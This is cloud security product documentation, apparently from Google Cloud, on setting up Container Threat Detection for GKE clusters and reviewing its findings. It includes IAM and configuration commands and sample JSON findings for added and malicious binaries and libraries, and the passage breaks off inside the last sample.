This page shows you how to review Container Threat Detection findings in the Google Cloud console and includes examples of Container Threat Detection findings.
Container Threat Detection is a built-in service of the Premium and Enterprise tiers of Security Command Center.
To view Container Threat Detection findings, the service must be enabled in Security Command Center Services settings.
Learn more about viewing and managing Container Threat Detection findings in Reviewing findings on this page.
To activate Container Threat Detection and other Premium tier detectors at the project level, see Activate Security Command Center for a project. The Enterprise tier does not support project-level activations.
Using a supported GKE version
To detect potential threats to your containers, make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). Container Threat Detection currently supports the following GKE versions on the Stable, Regular, and Rapid channels:
- GKE Standard >= 1.15.9-gke.12
- GKE Standard >= 1.16.5-gke.2
- GKE Standard >= 1.17
- GKE Standard >= 1.18.10-gke.1400
- GKE Standard >= 1.19.2-gke.2000
- GKE Standard >= 1.20
- GKE Standard >= 1.21
- GKE Autopilot >= 1.21.11-gke.900
- GKE Standard and Autopilot >= 1.22
- GKE Standard and Autopilot >= 1.23
Container Threat Detection supports only Container-Optimized OS node images.
Enabling Container Threat Detection
When you activate the Premium or Enterprise tier of Security Command Center, Container Threat Detection is enabled by default, unless you choose to disable it during the activation process.
If you need to enable or disable Container Threat Detection for your organization or project, you can do so on the Security Command Center Settings page. For more information, see Enable or disable a built-in service.
When you enable Container Threat Detection, either by activating Security Command Center or later, do the following:
- For any clusters that are not on a supported version of GKE, complete the steps in the guide to upgrade a cluster.
- Ensure your clusters have sufficient resources available to run the Container Threat Detection DaemonSet.
- In the Google Cloud console, review the Container Threat Detection service enablement settings to ensure that Container Threat Detection is enabled for your clusters.
Required IAM permissions
Container Threat Detection requires permission to enable and disable itself and manage the Container Threat Detection agent on GKE clusters.
To give the required permission, the IAM role
Container Threat Detection Service Agent
(roles/containerthreatdetection.serviceAgent) must be granted
to the Container Threat Detection service agent, which is a type of service account.
Removing this default role from the service agent could stop Container Threat Detection from functioning properly.
Depending on how and when Security Command Center was activated, the name of the service agent that Container Threat Detection uses is different:
If Security Command Center was activated before December 7, 2023, Container Threat Detection uses the following user-managed service agent:
service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.comIf Security Command Center was activated at the organization level after December 7, 2023, Container Threat Detection uses the following user-managed organization-level service agent:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.comIf Security Command Center was activated at the project level after December 7, 2023, Container Threat Detection uses the following user-managed organization-level service agent:
service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
For more information about service agents and IAM roles, see the following:
Permissions required for custom GKE node service account
When you use a custom service account for your GKE nodes, the
new node service account needs permissions to interact with Container Threat Detection.
To give these permissions to the service account, you grant it the Service
Account Token Creator role (roles/iam.serviceAccountTokenCreator).
Grant the Service Account Token Creator role to the node service account:
gcloud iam service-accounts add-iam-policy-binding \ SERVICE_ACCOUNT_NAME \ --member=serviceAccount:service-PROJECT_NUMBER@compute-system.iam.gserviceaccount.com \ --role=roles/iam.serviceAccountTokenCreatorReplace the following values:
- Replace SERVICE_ACCOUNT_NAME with the email address of your new node service account.
- Replace PROJECT_NUMBER with the project number where Container Threat Detection is deployed. This is crucial if it's different from the service account's project.
Enable the Container Threat Detection API on the same project where the new node service account was created:
gcloud services enable containerthreatdetection.googleapis.com --project PROJECT_IDReplace PROJECT_ID with the ID of the project where the new node service account resides.
Checking GKE cluster configuration
For Container Threat Detection to work, if your cluster is in a Virtual Private Cloud (VPC), its network must meet the routing, firewall, and DNS requirements to communicate with Google APIs and services. To access Google APIs, review the following guides:
- If your cluster is a private cluster, see Configuring Private Google Access or Configuring Private Service Connect.
- If your cluster is within a VPC Service Controls service perimeter, make sure you follow the instructions at service perimeter overview.
- If your cluster is not a private cluster, see Accessing APIs from VMs with external IP addresses.
Also, your GKE cluster configuration or organization policy constraints must not block the creation or use of any objects that Container Threat Detection needs to function. The following sections include a list of GKE objects that Container Threat Detection creates and explain how to configure essential GKE components to work with Container Threat Detection.
Kubernetes objects
After onboarding, Container Threat Detection creates several GKE objects in your enabled clusters. The objects are used to monitor container images, manage privileged containers and pods, and evaluate state to generate findings. The following table lists the objects, their properties, and essential functions.
| Object | Name1 | Properties | Function |
|---|---|---|---|
| ClusterRole | container-watcher-pod-reader |
Grants get, watch, and list permissions on pods |
|
| ClusterRole | pod-reader |
Grants get, watch, and list permissions on pods |
|
| ClusterRoleBinding |
|
Grants container-watcher-pod-reader and gce:podsecuritypolicy:privileged roles to container-watcher-pod-reader ServiceAccount
|
|
| CustomResourceDefinition | containerwatcherstatuses.containerthreatdetection.googleapis.com |
DaemonSet status reporting | |
| DaemonSet | container-watcher2 |
Privileged | Interactions with Linux Security Module and container engine |
| Mounts /host/ as read and write | Communication with Linux Security Module | ||
Mounts /etc/container-watcher/secrets as read-only to access container-watcher-token |
Authentication | ||
Uses hostNetwork |
Finding generation | ||
| Image gke.gcr.io/watcher-daemonset |
Enablement and upgrade | ||
| Backend containerthreatdetection-REGION.googleapis.com:443 |
Finding generation | ||
| Role | container-watcher-status-reporter |
Role with get, list, watch, create, update, patch verbs for the containerwatcherstatuses.containerthreatdetection.googleapis.com CustomResourceDefinition |
Allows updating DaemonSet status information |
| RoleBinding | gce:podsecuritypolicy:container-watcher |
Grants gce:podsecuritypolicy:privileged role to container-watcher-pod-reader ServiceAccount |
Preserves functionality when PodSecurityPolicy is enabled |
container-watcher-status-reporter |
Grants container-watcher-status-reporter role to container-watcher-pod-reader ServiceAccount |
||
| Secret | container-watcher-token |
Authentication | |
| ServiceAccount | container-watcher-pod-reader |
Enablement, upgrade, and disablement |
1 All objects are in the kube-system namespace, except
container-watcher-pod-reader and gce:podsecuritypolicy:container-watcher.
2 During the installation, update, or removal of Container Threat Detection,
Kubernetes might issue error messages for Kubernetes objects or other dependencies
that are momentarily missing or incomplete. For example, there might an instance
where the container-watcher-pod-reader role may be missing, which might result
in preventing the installation of the pod watcher. You may see error logs such as
serviceaccount "container-watcher-pod-reader" not found indicating this issue.
Typically, these errors resolve automatically once Container Threat Detection completes
the process. Unless the errors persist beyond a few minutes, they can be safely
ignored.
PodSecurityPolicy and Admission Controllers
A PodSecurityPolicy is
an admission controller resource you set up that validates requests to create
and update pods on your cluster. Container Threat Detection is compatible with
PodSecurityPolicies that are automatically applied when creating or updating a
cluster with the enable-pod-security-policy flag. Specifically,
Container Threat Detection uses the gce.privileged policy when PodSecurityPolicy
is enabled.
If you use custom PodSecurityPolicies or other admission controllers, they must not block the creation or use of objects Container Threat Detection needs to function. For example, a webhook-based admission controller that rejects or overrides privileged deployments could prevent Container Threat Detection from functioning properly.
For more information, see Using PodSecurityPolicies.
Excluding environment variables from Container Threat Detection findings
By default, when Container Threat Detection generates a finding, it reports environment
variables for all processes referenced in the finding. Environment variable
values can be important when investigating an attack. However, some software
packages store secrets and other sensitive information in environment
variables. To prevent Container Threat Detection from including process environment
variables in any Container Threat Detection finding, disable the
REPORT_ENVIRONMENT_VARIABLES module using Google Cloud CLI or
the Security Center Management API's
securityCenterServices.patch
method at the organization, folder, or project level.
For example, to disable environment variable reporting in a project, create a
file named module_config.yaml with the following contents:
REPORT_ENVIRONMENT_VARIABLES:
intendedEnablementState: DISABLED
Then run the following command:
gcloud scc manage services update container-threat-detection \
--module-config-file=module_config.yaml \
--project=PROJECT_ID
To restore the default behavior, edit module_config.yaml so that it contains
the following, and then run the command again:
REPORT_ENVIRONMENT_VARIABLES:
intendedEnablementState: ENABLED
To see all of the gcloud CLI commands for managing services, see
gcloud scc manage services.
Excluding CLI arguments from Container Threat Detection findings
All processes have one or more command line (CLI) arguments. By default, when
Container Threat Detection includes process details in a finding, it records the CLI
arguments of the process. CLI argument values can be important when
investigating an attack. However, some users may pass secrets and other
sensitive information in CLI arguments. To prevent Container Threat Detection from
including process CLI arguments in any Container Threat Detection finding, disable the
REPORT_CLI_ARGUMENTS module using Google Cloud CLI or
the Security Center Management API's
securityCenterServices.patch
method at the organization, folder, or project level.
For example, to disable CLI argument reporting in a project, create a
file named module_config.yaml with the following contents:
REPORT_CLI_ARGUMENTS:
intendedEnablementState: DISABLED
Then run the following command:
gcloud scc manage services update container-threat-detection \
--module-config-file=module_config.yaml \
--project=PROJECT_ID
To restore the default behavior, edit module_config.yaml so that it contains
the following, and then run the command again:
REPORT_CLI_ARGUMENTS:
intendedEnablementState: ENABLED
To see all of the gcloud CLI commands for managing services, see
gcloud scc manage services.
Resource usage
Container Threat Detection is designed to have a negligible performance impact on your clusters and should not have a latency impact on any cluster operations.
Resource usage depends on the workload. However, Container Threat Detection's core components—the userspace DaemonSet and Linux Security Module (LSM)—have the following estimated performance impact:
- DaemonSet: A maximum of 0.125 vCPU and 300 MB of memory, based on hard limits set to restrict resource usage. Limits are occasionally reevaluated and can be changed to optimize performance, particularly for very large nodes.
- LSM: Varies based on workload characteristics but, in cases that stress the LSM, we observe less than 2% of CPU and 1% of memory. You can test performance impact by instrumenting workloads with and without Container Threat Detection enabled.
If you are a BigQuery customer, you can enable GKE
usage metering to
monitor the resource usage of Container Threat Detection's userspace DaemonSet. To view
the userspace DaemonSet in usage metering, search for namespace kube-system
and label k8s-app=container-watcher.
GKE usage metering can't track kernel CPU usage specifically for the LSM. That data is included in overall CPU usage.
Container Threat Detection API
Container Threat Detection automatically enables the containerthreatdetection API during onboarding to allow finding generation. You should not interact directly with this required API. Disabling this API would damage Container Threat Detection's ability to generate new findings. If you want to stop receiving Container Threat Detection findings, disable Container Threat Detection in Security Command Center Services settings.
Reviewing findings
When Container Threat Detection generates findings, you can view them in Security Command Center. If you configured log exports to Cloud Logging, you can also view findings in Cloud Logging. To generate a finding and verify your configuration, you can intentionally trigger a detector and test Container Threat Detection.
Container Threat Detection has the following latencies:
- Activation latency of 3.5 hours for newly onboarded organizations or projects.
- Activation latency of minutes for newly created clusters.
- Detection latency of minutes for threats in clusters that have been activated.
Review findings in the Google Cloud console
The IAM roles for Security Command Center can be granted at the organization, folder, or project level. Your ability to view, edit, create, or update findings, assets, and security sources depends on the level for which you are granted access. To learn more about Security Command Center roles, see Access control.
To review Container Threat Detection findings in Security Command Center follow these steps:
- In the Google Cloud console, go to the Findings page of Security Command Center.
- Select your Google Cloud project or organization.
- In the Quick filters section, in the Source display name subsection, select Container Threat Detection. The findings query results are updated to show only the findings from this source.
- To view the details of a specific finding, click the finding name under Category. The details panel for the finding opens and displays the Summary tab.
- On the Summary tab, review the details of the finding, including information about what was detected, the affected resource, and—if available—steps that you can take to remediate the finding.
- Optional: To view the full JSON definition of the finding, click the JSON tab.
To aid in your investigation, threat findings also contain links to the following external resources:
- MITRE ATT&CK framework entries. The framework explains techniques for attacks against cloud resources and provides remediation guidance.
- VirusTotal, an Alphabet-owned service that provides context on potentially malicious files, scripts, URLs, and domains.
For a list of Container Threat Detection findings, see Container Threat Detection detectors.
Viewing findings in Cloud Logging
To view Container Threat Detection findings in Cloud Logging, do the following:
Go to the Logs Explorer page for Cloud Logging in the Google Cloud console.
In the Project selector at the top of the page, select the project where you are storing your Container Threat Detection logs.
Click the Query builder tab.
In the Resource drop-down list, select Threat Detector.
- To view findings from all detectors, select all detector_name.
- To view findings from a specific detector, select its name.
Alternatively, enter
resource.type="threat_detector"in the query builder text box, and then click Run Query.The table is updated with the logs you selected.
Create advanced log queries to specify a set of log entries from any number of logs.
Example finding formats
This section includes the JSON formats of the Container Threat Detection findings.
These examples contain the fields most common to all findings. However, all fields may not appear in every finding. The actual output you see depends on a resource's configuration and the type and state of findings. Information from Kubernetes and containerd is given by best-effort and is not guaranteed.
For more information about the fields in each finding, see the field descriptions in REST Resource: organizations.sources.findings.
Added Binary Executed
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Binary Executed",
"sourceProperties": {
"VM_Instance_Name": "INSTANCE_ID",
"Added_Binary_Kind": "Added",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Name": "CONTAINER_NAME",
"Parent_Pid": 1.0,
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Creation_Timestamp": {
"seconds": 1.617989997E9,
"nanos": 1.17396995E8
},
"Pid": 53.0,
"Pod_Namespace": "default",
"Process_Binary_Fullpath": "BINARY_PATH",
"Process_Arguments": ["BINARY_PATH"],
"Pod_Name": "POD_NAME",
"description": "A binary that was not part of the original container image
was executed. If an added binary is executed by an attacker, this is a
possible sign that an attacker has control of the workload and they are
executing arbitrary commands.",
"Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
test-4af235e12be6f9d9", "HOME\u003d/root",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
"Container_Creation_Timestamp": {
"seconds": 1.617989918E9,
"nanos": 0.0
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:39:57.527Z",
"createTime": "2021-04-09T17:39:57.625Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Added_Binary_Kind": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "LOW",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Added Library Loaded
{
"finding": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"state": "ACTIVE",
"category": "Added Library Loaded",
"sourceProperties": {
"Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
"Parent_Pid": 1.0,
"Container_Name": "CONTAINER_NAME",
"Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1.618004144E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Pid": 7.0,
"description": "A library that was not part of the original container
image was loaded. If an added library is loaded, this is a possible sign
that an attacker has control of the workload and they are executing
arbitrary code.",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Namespace": "default",
"Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
"KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
"HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
"KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
"PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
, "KUBERNETES_PORT_443_TCP_PORT\u003d443",
"KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
"DEBIAN_FRONTEND\u003dnoninteractive",
"KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
"KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
"Process_Binary_Fullpath": "BINARY_PATH",
"Added_Library_Kind": "Added",
"Container_Image_Uri": "CONTAINER_IMAGE_uri"
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T21:36:13.069Z",
"createTime": "2021-04-09T21:36:13.267Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Added_Library_Fullpath": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Added_Library_Kind": {
"primitiveDataType": "STRING"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "LOW",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Execution: Added Malicious Binary Executed
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Binary Executed",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T19:51:22.538Z",
"database": {},
"eventTime": "2023-11-13T19:51:22.383Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-test-malicious-binary\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.68.2.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.68.2.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "7",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_binary_executed"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699905066",
"nanos": 618571329
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
"relatedFindingUri": {}
}
}
}
Execution: Added Malicious Library Loaded
{
"finding": {
"access": {},
"application": {},
"attackExposure": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
"category": "Execution: Added Malicious Library Loaded",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-11-13T21:40:14.340Z",
"database": {},
"eventTime": "2023-11-13T21:40:14.209Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"name": "CONTAINER_NAME",
"ns": "default",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
],
"nodes": [
{
"name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
}
]
},
"mitreAttack": {
"primaryTactic": "COMMAND_AND_CONTROL",
"primaryTechniques": [
"INGRESS_TOOL_TRANSFER"
]
},
"mute": "UNDEFINED",
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/malicious_files/drop_mal_lib\"",
"size": "5005064",
"sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
"hashedSize": "5005064",
"partiallyHashed": false
},
"libraries": [
{
"path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
"size": "68",
"sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
"hashedSize": "68",
"partiallyHashed": false
}
],
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"/malicious_files/drop_mal_lib\"",
"\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-added-malicious-library\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PATH\"",
"val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.108.174.129:443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.108.174.129\""
},
{
"name": "\"PWD\"",
"val": "\"/malicious_files\""
}
],
"pid": "8",
"parentPid": "1"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"securityPosture": {},
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {},
"externalSystems": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"sourceId": {
"projectNumber": "PROJECT_NUMBER",
"customerOrganizationNumber": "ORGANIZATION_NUMBER"
},
"detectionCategory": {
"ruleName": "added_malicious_library_loaded"
},
"detectionPriority": "CRITICAL",
"affectedResources": [
{
"gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
}
],
"evidence": [
{
"sourceLogId": {
"projectId": "PROJECT_ID",
"resourceContainer": "projects/PROJECT_NUMBER",
"timestamp": {
"seconds": "1699911603",
"nanos": 535268047
}
}
}
],
"properties": {},
"findingId": "FINDING_ID",
"contextUris": {
"mitreUri": {
"displayName": "MITRE Link",
"url": "https://attack.mitre.org/techniques/T1105/"
},
"virustotalIndicatorQueryUri": [
{
"displayName": "VirusTotal IP Link",
"url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
}
],
"cloudLoggingQueryUri": [
{
"displayName": "Cloud Logging Query Link",
"url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
}
],
